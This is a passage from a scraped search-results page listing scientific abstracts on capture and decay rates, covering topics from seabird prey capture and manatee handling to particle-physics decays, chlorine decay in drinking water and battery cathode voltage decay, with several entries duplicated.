prey density (prediction 3). Estimated prey capture rates increased non-linearly as 0-group sandeel length declined, with the slope being steeper in razorbills, supporting prediction 1. When prey patches were more dispersed, estimated daily energy expenditure increased by a factor of 3.0 for guillemots and 2.3 for razorbills, suggesting guillemots were more sensitive to patchier prey, supporting prediction 2. However, both species responded similarly to reduced prey density (guillemot expenditure increased by 1.7; razorbill by 1.6), thus not supporting prediction 3. This bio-energetics approach complements other foraging models in predicting likely 3. Modelling the effects of prey size and distribution on prey capture rates of two sympatric marine predators. PubMed Thaxter, Chris B; Daunt, Francis; Grémillet, David; Harris, Mike P; Benvenuti, Silvano; Watanuki, Yutaka; Hamer, Keith C; Wanless, Sarah 2013-01-01 Understanding how prey capture rates are influenced by feeding ecology and environmental conditions is fundamental to assessing anthropogenic impacts on marine higher predators. We compared how prey capture rates varied in relation to prey size, prey patch distribution and prey density for two species of alcid, common guillemot (Uria aalge) and razorbill (Alca torda) during the chick-rearing period. We developed a Monte Carlo approach parameterised with foraging behaviour from bird-borne data loggers, observations of prey fed to chicks, and adult diet from water-offloading, to construct a bio-energetics model. Our primary goal was to estimate prey capture rates, and a secondary aim was to test responses to a set of biologically plausible environmental scenarios. Estimated prey capture rates were 1.5 ± 0.8 items per dive (0.8 ± 0.4 and 1.1 ± 0.6 items per minute foraging and underwater, respectively) for guillemots and 3.7 ± 2.4 items per dive (4.9 ± 3.1 and 7.3 ± 4.0 items per minute foraging and underwater, respectively) for razorbills. Based on species' ecology, diet and flight costs, we predicted that razorbills would be more sensitive to decreases in 0-group sandeel (Ammodytes marinus) length (prediction 1), but guillemots would be more sensitive to prey patches that were more widely spaced (prediction 2), and lower in prey density (prediction 3). Estimated prey capture rates increased non-linearly as 0-group sandeel length declined, with the slope being steeper in razorbills, supporting prediction 1. When prey patches were more dispersed, estimated daily energy expenditure increased by a factor of 3.0 for guillemots and 2.3 for razorbills, suggesting guillemots were more sensitive to patchier prey, supporting prediction 2. However, both species responded similarly to reduced prey density (guillemot expenditure increased by 1.7; razorbill by 1.6), thus not supporting prediction 3. This bio-energetics approach complements other foraging models in 4. Estimating Suicide Rates in Developing Nations: A Low-Cost Newspaper Capture-Recapture Approach in Cambodia. PubMed Harris, Keith M; Thandrayen, Joanne; Samphoas, Chien; Se, Pros; Lewchalermwongse, Boontriga; Ratanashevorn, Rattanakorn; Perry, Megan L; Britts, Choloe 2016-04-01 This study tested a low-cost method for estimating suicide rates in developing nations that lack adequate statistics. Data comprised reported suicides from Cambodia's 2 largest newspapers. Capture-recapture modeling estimated a suicide rate of 3.8/100 000 (95% CI = 2.5-6.7) for 2012. That compares to World Health Organization estimates of 1.3 to 9.4/100 000 and a Cambodian government estimate of 3.5/100 000. Suicide rates of males were twice that of females, and rates of those <40 years were twice that of those ≥40 years. Capture-recapture modeling with newspaper reports proved a reasonable method for estimating suicide rates for countries with inadequate official data. These methods are low-cost and can be applied to regions with at least 2 newspapers with overlapping reports. Means to further improve this approach are discussed. These methods are applicable to both recent and historical data, which can benefit epidemiological work, and may also be applicable to homicides and other statistics. © 2016 APJPH. 5. Ground-state proton decay of 69Br and implications for the 68Se astrophysical rapid proton-capture process waiting point. PubMed Rogers, A M; Famiano, M A; Lynch, W G; Wallace, M S; Amorini, F; Bazin, D; Charity, R J; Delaunay, F; de Souza, R T; Elson, J; Gade, A; Galaviz, D; van Goethem, M-J; Hudan, S; Lee, J; Lobastov, S; Lukyanov, S; Matoš, M; Mocko, M; Schatz, H; Shapira, D; Sobotka, L G; Tsang, M B; Verde, G 2011-06-24 We report on the first direct measurement of the proton separation energy for the proton-unbound nucleus (69)Br. Bypassing the (68)Se waiting point in the rp process is directly related to the 2p-capture rate through (69)Br, which depends exponentially on the proton separation energy. We find a proton separation energy for (69)Br of Sp((69)Br )= -785(-40)(+34) keV; this is less bound compared to previous predictions which have relied on uncertain theoretical calculations. The influence of the extracted proton separation energy on the rp process occurring in type I x-ray bursts is examined within the context of a one-zone burst model. 6. Computing decay rates for new physics theories with FEYNRULES and MADGRAPH 5_AMC@NLO Alwall, Johan; Duhr, Claude; Fuks, Benjamin; Mattelaer, Olivier; Öztürk, Deniz Gizem; Shen, Chia-Hsien 2015-12-01 We present new features of the FEYNRULES and MADGRAPH 5_AMC@NLO programs for the automatic computation of decay widths that consistently include channels of arbitrary final-state multiplicity. The implementations are generic enough so that they can be used in the framework of any quantum field theory, possibly including higher-dimensional operators. We extend at the same time the conventions of the Universal FEYNRULES Output (or UFO) format to include decay tables and information on the total widths. We finally provide a set of representative examples of the usage of the new functions of the different codes in the framework of the Standard Model, the Higgs Effective Field Theory, the Strongly Interacting Light Higgs model and the Minimal Supersymmetric Standard Model and compare the results to available literature and programs for validation purposes. 7. Auger decay rates of core hole states using equation of motion coupled cluster method Ghosh, Aryya; Vaval, Nayana; Pal, Sourav 2017-01-01 The recent development of Linac coherent light source high intense X-ray laser makes it possible to create double core ionization in the molecule. The generation of double core hole state and its decay is identified by Auger spectroscopy. The decay of this double core hole (DCH) states can be used as a powerful spectroscopic tool in chemical analysis. In the present work, we have implemented a promising approach, known as CAP-EOMCC method, which is a combination of complex absorbing potential (CAP) and equation-of-motion coupled cluster (EOMCC) approach to calculate the lifetime of single and double core hole states. We have applied this method to calculate the lifetime of the single core hole (K-LL) and double core hole (KK-KLL) states of CH4, NH3 and HF molecules. The predicted lifetime is found to be extremely short. 8. Evidence for CP violation in time-integrated D0→h(-)h(+) decay rates. PubMed 2012-03-16 A search for time-integrated CP violation in D(0)→h(-)h(+) (h=K, π) decays is presented using 0.62 fb(-1) of data collected by LHCb in 2011. The flavor of the charm meson is determined by the charge of the slow pion in the D(*+)→D(0)π(+) and D(*-)→D[over ¯](0)π(-) decay chains. The difference in CP asymmetry between D(0)→K(-)K(+) and D(0)→π(-)π(+), ΔA(CP)≡A(CP)(K(-)K(+))-A(CP)(π(-)π(+)), is measured to be [-0.82±0.21(stat)±0.11(syst)]%. This differs from the hypothesis of CP conservation by 3.5 standard deviations. 9. Evidence for CP Violation in Time-Integrated D0→h-h+ Decay Rates 2012-03-01 A search for time-integrated CP violation in D0→h-h+ (h=K, π) decays is presented using 0.62fb-1 of data collected by LHCb in 2011. The flavor of the charm meson is determined by the charge of the slow pion in the D*+→D0π+ and D*-→D¯0π- decay chains. The difference in CP asymmetry between D0→K-K+ and D0→π-π+, ΔACP≡ACP(K-K+)-ACP(π-π+), is measured to be [-0.82±0.21(stat)±0.11(syst)]%. This differs from the hypothesis of CP conservation by 3.5 standard deviations. 10. Real-Time Imaging of Ground Cover: Relationships with Radiation Capture, Canopy Photosynthesis, and Daily Growth Rate NASA Technical Reports Server (NTRS) Klassen, S. P.; Ritchie, G.; Frantz, J. M.; Pinnock, D.; Bugbee, B. 2003-01-01 Cumulative absorbed radiation is highly correlated with crop biomass and yield. In this chapter we describe the use of a digital camera and commercial imaging software for estimating daily radiation capture, canopy photosynthesis, and relative growth rate. Digital images were used to determine percentage of ground cover of lettuce (Lactuca sativa L.) communities grown at five temperatures. Plants were grown in a steady-state, 10-chamber CO2 gas exchange system, which was used to measure canopy photosynthesis and daily carbon gain. Daily measurements of percentage of ground cover were highly correlated with daily measurements of both absorbed radiation (r(sup 2) = 0.99) and daily carbon gain (r(sup 2) = 0.99). Differences among temperature treatments indicated that these relationships were influenced by leaf angle, leaf area index, and chlorophyll content. An analysis of the daily images also provided good estimates of relative growth rates, which were verified by gas exchange measurements of daily carbon gain. In a separate study we found that images taken at hourly intervals were effective for monitoring real-time growth. Our data suggests that hourly images can be used for early detection of plant stress. Applications, limitations, and potential errors are discussed. We have long known that crop yield is determined by the efficiency of four component processes: (i) radiation capture, (ii) quantum yield, (iii) carbon use efficiency, and (iv) carbon partitioning efficiency (Charles-Edwards, 1982; Penning de Vries & van Laar, 1982; Thornley, 1976). More than one-half century ago, Watson (1947, 1952) showed that variation in radiation capture accounted for almost all of the variation in yield between sites in temperate regions, because the three other components are relatively constant when the crop is not severely stressed. More recently, Monteith (1977) reviewed the literature on the close correlation between radiation capture and yield. Bugbee and Monje (1992 11. Real-Time Imaging of Ground Cover: Relationships with Radiation Capture, Canopy Photosynthesis, and Daily Growth Rate NASA Technical Reports Server (NTRS) Klassen, S. P.; Ritchie, G.; Frantz, J. M.; Pinnock, D.; Bugbee, B. 2003-01-01 Cumulative absorbed radiation is highly correlated with crop biomass and yield. In this chapter we describe the use of a digital camera and commercial imaging software for estimating daily radiation capture, canopy photosynthesis, and relative growth rate. Digital images were used to determine percentage of ground cover of lettuce (Lactuca sativa L.) communities grown at five temperatures. Plants were grown in a steady-state, 10-chamber CO2 gas exchange system, which was used to measure canopy photosynthesis and daily carbon gain. Daily measurements of percentage of ground cover were highly correlated with daily measurements of both absorbed radiation (r(sup 2) = 0.99) and daily carbon gain (r(sup 2) = 0.99). Differences among temperature treatments indicated that these relationships were influenced by leaf angle, leaf area index, and chlorophyll content. An analysis of the daily images also provided good estimates of relative growth rates, which were verified by gas exchange measurements of daily carbon gain. In a separate study we found that images taken at hourly intervals were effective for monitoring real-time growth. Our data suggests that hourly images can be used for early detection of plant stress. Applications, limitations, and potential errors are discussed. We have long known that crop yield is determined by the efficiency of four component processes: (i) radiation capture, (ii) quantum yield, (iii) carbon use efficiency, and (iv) carbon partitioning efficiency (Charles-Edwards, 1982; Penning de Vries & van Laar, 1982; Thornley, 1976). More than one-half century ago, Watson (1947, 1952) showed that variation in radiation capture accounted for almost all of the variation in yield between sites in temperate regions, because the three other components are relatively constant when the crop is not severely stressed. More recently, Monteith (1977) reviewed the literature on the close correlation between radiation capture and yield. Bugbee and Monje (1992 12. Decay rates of faecal indicator bacteria from sewage and ovine faeces in brackish and freshwater microcosms with contrasting suspended particulate matter concentrations. PubMed Perkins, Tracy L; Perrow, Karen; Rajko-Nenow, Paulina; Jago, Colin F; Jones, Davey L; Malham, Shelagh K; McDonald, James E 2016-12-01 To safeguard human health, legislative measures require the monitoring of faecal indicator bacteria (FIB) concentrations in recreational and shellfish waters. Consequently, numerous studies have focussed on FIB survival in the water column and more recently in estuarine sediments. However, there is a paucity of information regarding the influence of contrasting suspended particulate matter (SPM) concentrations on the survival of FIB in the water column of estuaries. Here, microcosms containing freshwater or brackish water with low, high and extreme SPM concentrations were inoculated with sewage and ovine faeces and the decay rate of Escherichia coli, coliforms and enterococci were determined by enumeration over five consecutive days. E. coli derived from ovine faeces proliferated and persisted at high levels in both freshwater and brackish microcosms (no decay), whereas ovine enterococci demonstrated a net decay over the duration of the experiment. Furthermore, SPM concentration had a significant effect on the decay rates of both E. coli and enterococci from ovine faeces in brackish microcosms, but decay rate was greater at low SPM concentrations for E. coli, whereas the opposite was observed for enterococci, whose decay rates increased as SPM concentration increased. E. coli, enterococci and coliforms derived from wastewater demonstrated a net decay in both freshwater and brackish microcosms, with contrasting effects of SPM concentration on decay rate. In addition, some FIB groups demonstrated contrasting responses (decay or proliferation) in the first 24h following inoculation into freshwater versus brackish microcosms. Overall, SPM concentrations influenced the proliferation and decay rates of FIB in brackish waters, but had minimal influence in freshwater. These results demonstrate that the survival rates of FIB in aquatic environments are system specific, species and source dependent, and influenced by SPM concentration. This study has important implications 13. A variable reaction rate model for chlorine decay in drinking water due to the reaction with dissolved organic matter. PubMed Hua, Pei; Vasyukova, Ekaterina; Uhl, Wolfgang 2015-05-15 A second order kinetic model for simulating chlorine decay in bulk water due to the reaction with dissolved organic matter (DOM) was developed. It takes into account the decreasing reactivity of dissolved organic matter using a variable reaction rate coefficient (VRRC) which decreases with an increasing conversion. The concentration of reducing species is surrogated by the maximum chlorine demand. Temperature dependency, respectively, is described by the Arrhenius-relationship. The accuracy and adequacy of the proposed model to describe chlorine decay in bulk water were evaluated and shown for very different waters and different conditions such as water mixing or rechlorination by applying statistical tests. It is thus very well suited for application in water quality modeling for distribution systems. 14. Decay Rate of Correlated Real-Space Delocalization Measures: Insights into Chemical Bonding and Mott Transitions from Hydrogen Chains. PubMed Gallo-Bueno, A; Kohout, M; Martı́n Pendás, A 2016-07-12 We study in this contribution the spatial decay rate of real-space localization and delocalization indices in correlated systems. To that end, we examine Hubbard and quantum chemical models of simple cyclic hydrogen chains, showing that all descriptors of delocalization converge quickly toward the infinite chain limits. It is then shown that the localization index may be understood as a generalization of the standard order parameter in Mott insulator transitions and that the origin of the enigmatic sigmoidal profile of delocalization indices in chemical bond-breaking processes lies in the nonlinear mapping between intersite distances and correlation parameters. Although the long-range asymptotic decay of delocalization indices is exponential, we show that as the correlation parameter decreases quantum mechanical interference sets in and a switch to an oscillating pattern, related to core chemical concepts such as resonance or mesomerism, appears. 15. Monte Carlo simulations of growth/decay rate constant ratios for small methanol clusters: Application to nucleation data analysis Hale, Barbara; Wilemski, Gerald; Viets, Aaron 2013-05-01 The Bennett Monte Carlo technique and the potential of van Leeuwen and Smit are used to calculate growth/decay rate constant ratios for small model methanol clusters at 220K, 240K and 260K. Temperature scaling properties of the rate constant ratios are demonstrated at these temperatures. The Monte Carlo results are used to study heat release from subcritical cluster formation in adiabatic nucleation rate measurements and to determine corrected final temperatures and supersaturation ratios for the methanol data of Strey, Wagner, and Schmeling. The corrected T and S values provide experimental rates with improved scaling properties. Nucleation rates are also calculated from the Monte Carlo free energy differences for the model methanol clusters and demonstrate the same scaling. 16. Monitoring oral temperature, heart rate, and respiration rate of West Indian manatees (Trichechus manatus) during capture and handling in the field USGS Publications Warehouse Wong, Arthur W.; Bonde, Robert K.; Siegal-Willott, Jessica; Stamper, M. Andrew; Colee, James; Powell, James A.; Reid, James P.; Deutsch, Charles J.; Harr, Kendal E. 2012-01-01 West Indian manatees (Trichechus manatus) are captured, handled, and transported to facilitate conservation, research, and rehabilitation efforts. Monitoring manatee oral temperature (OT), heart rate (HR), and respiration rate (RR) during out-of-water handling can assist efforts to maintain animal well-being and improve medical response to evidence of declining health. To determine effects of capture on manatee vital signs, we monitored OT, HR, and RR continuously for a 50-min period in 38 healthy, awake, juvenile and adult Florida manatees (T. m. latirostris) and 48 similar Antillean manatees (T. m. manatus). We examined creatine kinase (CK), potassium (K+), serum amyloid A (SAA), and lactate values for each animal to assess possible systemic inflammation and muscular trauma. OT range was 29.5 to 36.2° C, HR range was 32 to 88 beats/min, and RR range was 0 to 17 breaths/5 min. Antillean manatees had higher initial OT, HR, and RR than Florida manatees (p < 0.001). As monitoring time progressed, mean differences between the subspecies were no longer significant. High RR over monitoring time was associated with high lactate concentration. Antillean manatees had higher overall lactate values ([mean ± SD] 20.6 ± 7.8 mmol/L) than Florida manatees (13.7 ± 6.7 mmol/L; p < 0.001). We recommend monitoring manatee OT, HR, and RR during capture and handling in the field or in a captive care setting. 17. Development of a water boil-off spent-fuel calorimeter system. [To measure decay heat generation rate SciTech Connect Creer, J.M.; Shupe, J.W. Jr. 1981-05-01 A calorimeter system was developed to measure decay heat generation rates of unmodified spent fuel assemblies from commercial nuclear reactors. The system was designed, fabricated, and successfully tested using the following specifications: capacity of one BWR or PWR spent fuel assembly; decay heat generation range 0.1 to 2.5 kW; measurement time of < 12 h; and an accuracy of +-10% or better. The system was acceptance tested using a dc reference heater to simulate spent fuel assembly heat generation rates. Results of these tests indicated that the system could be used to measure heat generation rates between 0.5 and 2.5 kW within +- 5%. Measurements of heat generation rates of approx. 0.1 kW were obtained within +- 15%. The calorimeter system has the potential to permit measurements of heat generation rates of spent fuel assemblies and other devices in the 12- to 14-kW range. Results of calorimetry of a Turkey Point spent fuel assembly indicated that the assembly was generating approx. 1.55 kW. 18. Increasing capture efficiency of pallid sturgeon Scaphirhynchus albus (Forbes and Richardson, 1905) and the reliability of catch rate estimates USGS Publications Warehouse DeVries, R. J.; Hann, D. A.; Schramm, H.L. 2015-01-01 This study evaluated the effects of environmental parameters on the probability of capturing endangered pallid sturgeon (Scaphirhynchus albus) using trotlines in the lower Mississippi River. Pallid sturgeon were sampled by trotlines year round from 2008 to 2011. A logistic regression model indicated water temperature (T; P < 0.01) and depth (D; P = 0.03) had significant effects on capture probability (Y = −1.75 − 0.06T + 0.10D). Habitat type, surface current velocity, river stage, stage change and non-sturgeon bycatch were not significant predictors (P = 0.26–0.63). Although pallid sturgeon were caught throughout the year, the model predicted that sampling should focus on times when the water temperature is less than 12°C and in deeper water to maximize capture probability; these water temperature conditions commonly occur during November to March in the lower Mississippi River. Further, the significant effect of water temperature which varies widely over time, as well as water depth indicate that any efforts to use the catch rate to infer population trends will require the consideration of temperature and depth in standardized sampling efforts or adjustment of estimates. 19. [Comparative analysis of pregnancy rate/captured oocytes in an in vitro fertilization program]. PubMed Kably Ambe, Alberto; Estévez González, Sergio; Carballo Mondragón, Esperanza; Durán Monterrosas, Leonor 2008-05-01 Since in vitro fertilization/embryo transfer is used as a common assisted reproductive technique there have been attempts to increase its success rate. One way is to obtain more good quality mature ovules to fertilize them, and two to three good quality embryos to transfer. To determine if the number of retrieved oocytes is related with the pregnancy rate in IVF-ET. Reproductive and descriptive study; 172 patients in the IVF program were included. Whole patients had ovary stimulation with FSHr and antagonist multidose protocol. Five study groups were considered depending on the oocyte number retrieved. Data were analized and correlated with fertilization and pregnancy rate. There were no statistical differences among age, body mass index, percentage of mature oocyte, fertilization rate, embryo cell stage or basal levels of LH and Estradiol. Group three showed the highest pregnancy rate (64.29%) nevertheless group five had major number of embryo transferred (2.97 +/- 0.54 vs 3.17 +/- 0.45, p = 0.21). According to FSH doses given, group one had statistical difference related to group three, with higher dose (54.1 vs 62.1). According to previous studies, related to the number of oocyte retrieved, the possibility of pregnancy is higher with more than 13 oocytes retrieved (OR: 0.9 IC 95%: 0.4 -1.7). Pregnancy rate is higher when ten to fifteen oocytes were retrieved. 20. Rates, Polarizations, and Asymmetries in Charmless Vector-Vector B Decays SciTech Connect Aubert, B; Barate, R; Boutigny, D; Gaillard, J-M; Hicheur, A; Karyotakis, Y; Lees, J P; Robbe, P; Tisserand, V; Zghiche, A; Palano, A; Pompili, A; Chen, J C; Qi, N D; Rong, G; Wang, P; Zhu, Y S; Eigen, G; Ofte, I; Stugu, B; Abrams, G S; Borgland, A W; Breon, A B; Brown, D N; Button-Schaffer, J; Cahn, R N; Charles, E; Day, C T; Gill, M S; Gritsan, A V; Groysman, Y; Jacobsen, R G; Kadel, R W; Kadyk, J; Kerth, L T; Kolomensky, Yu. G; Kral, J F; Kukartsev, G; LeClerc, C; Levi, M E; Lynch, G; Mir, L M; Oddone, P J; Orimoto, T J; Pripstein, M; Roe, N A; Romosan, A; Ronan, M T; Shelkov, V G; Telnov, A V; Wenzel, W A; Harrison, T J; Hawkes, C M; Knowles, D J; Penny, R C; Watson, A T; Watson, N K; Deppermann, T; Goetzen, K; Koch, H; Lewandowski, B; Pelizaeus, M; Peters, K; Schmuecker, H; Barlow, N R; Bhimji, W; Boyd, J T; Chevalier, N; Cottingham, W N; Mackay, C; Wilson, F F; Hearty, C; Mattison, T S; McKenna, J A; Thiessen, D; Kyberd, P; McKemey, A K; Blinov, V E; Bukin, A D; Golubev, V B; Ivanchenko, V N; Kravchenko, E A; Onuchin, A P; Serednyakov, S I; Skovpen, Yu I; Solodov, E P; Yushkov, A N; Best, D; Chao, M; Kirkby, D; Lankford, A J; Mandelkern, M; McMahon, S; Mommsen, R K; Roethel, W; Stoker, D P; Buchanan, C; Hadavand, H K; Wright, Doug 2003-03-11 With a sample of approximately 89 million B{bar B} pairs collected with the BABAR detector, they measure branching fractions, determine the degree of longitudinal polarization, and search for direct CP violation in the decays B{sup 0} {yields} {phi}K*{sup 0} and B{sup +} {yields} {phi}K*{sup +}. They perform a search for other charmless vector-vector B decays involving {rho} and K*(892) resonances and observe the decays B{sup +} {yields} {rho}{sup 0} K*{sup +} and B{sup +} {yields} {rho}{sup 0}{rho}{sup +}. The branching fractions are measured to be {Beta}({phi}K*{sup 0}) = (11.1{sub -1.2}{sup +1.3} {+-} 1.1) x 10{sup -6}, {Beta}({phi}K*{sup +}) = (12.1{sub -1.9}{sup +2.1} {+-} 1.5) x 10{sup -6}, {Beta}({rho}{sup 0} K*{sup +}) = (7.7{sub -2.0}{sup +2.1} {+-} 1.4) x 10{sup -6}, and {Beta}({rho}{sup 0}{rho}{sup +}) = (9.9{sub -2.5}{sup +2.6} {+-} 2.5) x 10{sup -6}. The longitudinal polarization fractions are measured to be {Lambda}{sub L}/{Lambda}({phi}K*{sup 0}) = 0.65 {+-} 0.07 {+-} 0.04 and {Lambda}{sub L}/{Lambda}({phi}K*{sup +}) = 0.46 {+-} 0.12 {+-} 0.05. They measure the charge asymmetries: {Alpha}{sub CP}({phi}K*{sup 0}) = +0.04 {+-} 0.12 {+-} 0.02 and {Alpha}{sub CP}({phi}K*{sup +}) = +0.16 {+-} 0.17 {+-} 0.04. 1. Submicrosecond isomer in 45117Rh72 and the role of triaxiality in its electromagnetic decay rate Lalkovski, S.; Bruce, A. M.; Denis Bacelar, A. M.; Górska, M.; Pietri, S.; Podolyák, Zs.; Bednarczyk, P.; Caceres, L.; Casarejos, E.; Cullen, I. J.; Doornenbal, P.; Farrelly, G. F.; Garnsworthy, A. B.; Geissel, H.; Gelletly, W.; Gerl, J.; Grębosz, J.; Hinke, C.; Ilie, G.; Ivanova, D.; Jaworski, G.; Kisyov, S.; Kojouharov, I.; Kurz, N.; Minkov, N.; Myalski, S.; Palacz, M.; Petkov, P.; Prokopowicz, W.; Regan, P. H.; Schaffner, H.; Steer, S.; Tashenov, S.; Walker, P. M.; Wollersheim, H. J. 2013-08-01 The neutron-rich nucleus 117Rh was synthesized in the fission of a relativistic 238U beam produced at the GSI laboratory in Darmstadt, Germany. An isomeric state with t1/2=138(17) ns decaying by a single γ ray was observed, providing the first information on the excited states in this nucleus. The experimental data are discussed in terms of systematics and interpreted by using the Woods-Saxon deformed shell model and triaxial-rotor-plus-particle calculations. The origin of the isomer is explained as being due to a hindered E2 transition to the ground state. 2. Global existence and energy decay rates for a Kirchhoff-type wave equation with nonlinear dissipation. PubMed Kim, Daewook; Kim, Dojin; Hong, Keum-Shik; Jung, Il Hyo 2014-01-01 The first objective of this paper is to prove the existence and uniqueness of global solutions for a Kirchhoff-type wave equation with nonlinear dissipation of the form Ku'' + M(|A (1/2) u|(2))Au + g(u') = 0 under suitable assumptions on K, A, M(·), and g(·). Next, we derive decay estimates of the energy under some growth conditions on the nonlinear dissipation g. Lastly, numerical simulations in order to verify the analytical results are given. 3. Global Existence and Energy Decay Rates for a Kirchhoff-Type Wave Equation with Nonlinear Dissipation PubMed Central Kim, Dojin; Hong, Keum-Shik; Jung, Il Hyo 2014-01-01 The first objective of this paper is to prove the existence and uniqueness of global solutions for a Kirchhoff-type wave equation with nonlinear dissipation of the form Ku′′ + M(|A1/2u|2)Au + g(u′) = 0 under suitable assumptions on K, A, M(·), and g(·). Next, we derive decay estimates of the energy under some growth conditions on the nonlinear dissipation g. Lastly, numerical simulations in order to verify the analytical results are given. PMID:24977217 4. A measurement of the 2 neutrino double beta decay rate of tellurium-130 in the CUORICINO experiment Kogler, Laura Katherine CUORICINO was a cryogenic bolometer experiment designed to search for neutrinoless double beta decay and other rare processes, including double beta decay with two neutrinos (2nubetabeta). The experiment was located at Laboratori Nazionali del Gran Sasso and ran for a period of about 5 years, from 2003 to 2008. The detector consisted of an array of 62 TeO2 crystals arranged in a tower and operated at a temperature of ˜10 mK. Events depositing energy in the detectors, such as radioactive decays or impinging particles, produced thermal pulses in the crystals which were read out using sensitive thermistors. The experiment included 4 enriched crystals, 2 enriched with 130Te and 2 with 128Te, in order to aid in the measurement of the 2nubetabeta rate. The enriched crystals contained a total of ˜350 g 130Te. The 128-enriched (130-depleted) crystals were used as background monitors, so that the shared backgrounds could be subtracted from the energy spectrum of the 130-enriched crystals. Residual backgrounds in the subtracted spectrum were fit using spectra generated by Monte-Carlo simulations of natural radioactive contaminants located in and on the crystals. The 2nubetabeta half-life was measured to be T1/2 = [9.81 +/- 0.96(stat) +/- 0.49(syst)] x 1020 y. 5. Measurement of the rate of charm quark pairs produced by radiated gluons in hadronic Z decay Park, Hyangkyu 1998-11-01 We have measured the probability of gluon splitting to charm quark pairs using 1.7 million hadronic Z decays collected in 1994 and 1995 at the L3 detector. Although this process, gluon splitting to charm quark pairs, is one of the basic processes in QCD, it has not been well understood both theoretically and experimentally. Furthermore, the limited knowledge of this process is one of the biggest sources of error in the measurement of the fraction of Z decays to bottom quark pairs (Rb). For this measurement, we have applied two methods to events with a three-jet event topology. One method. relies on tagging charm hadrons by identifying a lepton in the lowest energy jet. Another method uses a neural network technique for identifying events containing gluon splitting into charm quark pairs. Though the first method provides a simple way to tag a charm quark, it is limited by statistics. The second method improves the statistical accuracy by utilizing the entire hadronic event sample. Combining both methods, we measure the average number of gluons splitting into charm quark pairs per hadronic event to be overlinenoverlineg-->coverlinecoverline =(2.22+/-0.18+/-0.44) %. We performed a combined fit with this result and other existing measurements of overlinenoverlineg-->coverlinecoverline at LEP experiments. The result allows a stringent test of various QCD models and reduces the single biggest source of systematic error in the measurement of Rb. 6. Constraints on the {tau} neutrino mass and mixing from precise measurements of {tau} decay rates SciTech Connect Swain, J.; Taylor, L. 1997-01-01 We have derived constraints on the {tau} neutrino mass and fourth generation mixing from an analysis of the partial widths of {tau} lepton decays, in particular, {tau}{sup {minus}}{r_arrow}e{sup {minus}}{bar {nu}}{sub e}{nu}{sub {tau}}, {tau}{sup {minus}}{r_arrow}{mu}{sup {minus}}{bar {nu}}{sub {mu}}{nu}{sub {tau}}, {tau}{r_arrow}{pi}{sup {minus}}{nu}{sub {tau}}, and {tau}{r_arrow}K{sup {minus}}{nu}{sub {tau}}. We present predictions for the {tau} decay widths, allowing for a nonzero {tau} neutrino mass m{sub {nu}{sub {tau}}} and for mixing with a neutrino of mass m{sub {nu}{sub L}}{gt}M{sub Z}/2, which is parametrized using a Cabibbo-like mixing angle {theta}{sub L}. By comparison of these theoretical predictions with the experimental measurements, we obtain the following bounds at the 90{percent} confidence level: m{sub {nu}{sub {tau}}}{lt}42 MeV and sin{sup 2}{theta}{sub L}{lt}0.014. {copyright} {ital 1997} {ital The American Physical Society} 7. Reaction rate calibration techniques at ZPPR for /sup 239/Pu fission, /sup 235/U fission, /sup 238/U fission, and /sup 238/U capture SciTech Connect 1982-06-10 Reaction-rate calibration techniques used at ZPPR are described for /sup 239/Pu fission, /sup 235/U fission, /sup 238/U fission and /sup 238/U capture. In addition to these absolute reaction rates, calibration techniques are described for fission-rate ratios and the ratio of /sup 238/U capture to /sup 239/U capture to /sup 239/Pu fission. Uncertainty estimates are presented for all calibrations. Intercomparison measurements are reported which support the validity of the calibration techniques and their estimated uncertainties. 8. Modularity and rates of evolutionary change in a power-amplified prey capture system. PubMed Claverie, Thomas; Patek, S N 2013-11-01 The dynamic interplay among structure, function, and phylogeny form a classic triad of influences on the patterns and processes of biological diversification. Although these dynamics are widely recognized as important, quantitative analyses of their interactions have infrequently been applied to biomechanical systems. Here we analyze these factors using a fundamental biomechanical mechanism: power amplification. Power-amplified systems use springs and latches to generate extremely fast and powerful movements. This study focuses specifically on the power amplification mechanism in the fast raptorial appendages of mantis shrimp (Crustacea: Stomatopoda). Using geometric morphometric and phylogenetic comparative analyses, we measured evolutionary modularity and rates of morphological evolution of the raptorial appendage's biomechanical components. We found that "smashers" (hammer-shaped raptorial appendages) exhibit lower modularity and 10-fold slower rates of morphological change when compared to non-smashers (spear-shaped or undifferentiated appendages). The morphological and biomechanical integration of this system at a macroevolutionary scale and the presence of variable rates of evolution reveal a balance between structural constraints, functional variation, and the "roles of development and genetics" in evolutionary diversification. © 2013 The Author(s). Evolution © 2013 The Society for the Study of Evolution. 9. Improving rate capability and decelerating voltage decay of Li-rich layered oxide cathodes via selenium doping to stabilize oxygen Ma, Quanxin; Li, Ruhong; Zheng, Rujuan; Liu, Yuanlong; Huo, Hua; Dai, Changsong 2016-11-01 To improve the rate performance and decelerate the voltage decay of Li-rich layered oxide cathode materials, a series of cathode materials Li1.2[Mn0.7Ni0.2Co0.1]0.8-xSexO2 (x = 0, 0.07, 0.14 and 0.21) was synthesized via co-precipitation. Based on the characterization results, it can be concluded that uniform Se6+ doping can improve the degree of crystallinity of Li2MnO3, resulting in a better ordering of atoms in the transition metal layer of this type of cathode materials. In the electrochemical experiments, compared to un-doped samples, one of the Se doped samples (LLMO-Se0.14) exhibited a longer sloping region and shorter potential plateau in the initial charge curves, a larger first coulombic efficiency (ca. 77%), better rate capability (178 mAhm g-1 at 10 C) and higher mid-point voltage (MPV) retention (ca. 95%) after 100 cycles. These results prove that Se doping can effectively improve the rate capability and decelerate the voltage decay process of these cathode materials during cycling via suppressing the oxidation process of O2- to O2 and curbing a layered-to-spinel phase transformation. The above-mentioned functions of Se doping are probably due to the higher bonding energy of Sesbnd O than that of Mnsbnd O. 10. Disintegration rate and gamma ray emission probability per decay measurement of 123I. PubMed Koskinas, M F; Gishitomi, K C; Brito, A B; Yamazaki, I M; Dias, M S 2012-09-01 A series of (123)I measurements have been carried out in a 4π(e(A),X)-γ coincidence system. The experimental extrapolation curve was determined and compared to Monte Carlo simulation, performed by code ESQUEMA. From the slope of the experimental curve, the total conversion coefficient for the 159 keV total gamma transition, α(159), was determined. All radioactive sources were also measured in an HPGe spectrometry system, in order to determine the gamma-ray emission probability per decay for several gamma transitions. All uncertainties involved and their correlations were analyzed applying the covariance matrix methodology and the measured parameters were compared with those from the literature. Copyright © 2012 Elsevier Ltd. All rights reserved. 11. Measurement of branching fractions and rate asymmetries in the rare decays B→K(*)l⁺l⁻ DOE PAGES Lees, J. P.; Poireau, V.; Tisserand, V.; ... 2012-08-24 In a sample of 471×10⁶ BB¯¯¯ events collected with the BABAR detector at the PEP-II e⁺e⁻ collider we study the rare decays B→K(*)l⁺l⁻, where l⁺l⁻ is either e⁺e⁻ or μ⁺μ⁻. 